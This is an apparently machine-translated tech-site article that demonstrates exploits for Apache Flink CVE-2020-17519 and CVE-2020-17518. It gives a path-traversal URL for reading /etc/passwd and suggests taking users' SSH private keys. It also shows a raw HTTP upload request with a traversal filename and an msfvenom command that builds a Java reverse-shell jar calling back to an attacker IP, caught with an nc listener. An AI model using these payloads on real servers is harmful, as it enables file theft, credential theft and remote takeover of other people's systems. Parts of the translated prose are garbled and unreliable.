Shulou(Shulou.com)05/31 Report--

This article shows you what the CVE-2020-17519 vulnerability analysis of Apache Flink arbitrary file reading is like, the content is concise and easy to understand, it can definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

I. arbitrary file reading (CVE-2020-17519)

Visit: http://your-ip:8081 to enter the Apache Flink control panel:

Use poc in the address bar:

Http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Read the / etc/passwd file:

In the test, it is found that it is not feasible to read / etc/shadow file, there is a permission problem, and the access will report an error directly:

However, you can try to use any file read attempt to read the ssh private key of the user's .ssh folder in the / home directory for ssh login, and then extract. (the author has not tried, you can explore according to this train of thought.)

2. Upload any file (CVE-2020-17518)

Arbitrary file uploads exist at the Submit New Job of the Apache Flink dashboard:

Use POC:

POST / jars/upload HTTP/1.1

Host: localhost:8081

Accept-Encoding: gzip, deflate

Accept: * / *

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Length: 187

-WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Disposition: form-data; name= "jarfile"; filename= ".. / tmp/success"

Success

-WebKitFormBoundaryoZ8meKnrrso89R6Y--

Enter the test environment to check that the success has been uploaded successfully:

In addition, we can upload jar horses to monitor the bounce and execute remote commands.

First, we use kali's MSF to generate jar horses:

Msfvenom-p java/shell_reverse_tcp lhost=192.168.153.6 lport=5555-f jar > / home/kali/Desktop/shell.jar

Where lhost is the IP,lport of the local machine is the bouncing port.

You can see that the jar horse (shell.jar) has been generated successfully.

Then create a new command line window on the local machine and use nc to listen on the port: nc-lvvp 5555

Finally, upload the generated jar horse through the Submit New Job module:

Click Submit to monitor the jar horse bounce:

Execute remote commands:

We can see here that his startup is not a root user, and he can better verify that an error was reported when reading shadow files when reading files, which is related to the permission problem.

The above content is what the CVE-2020-17519 vulnerability analysis of Apache Flink arbitrary file read is like, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.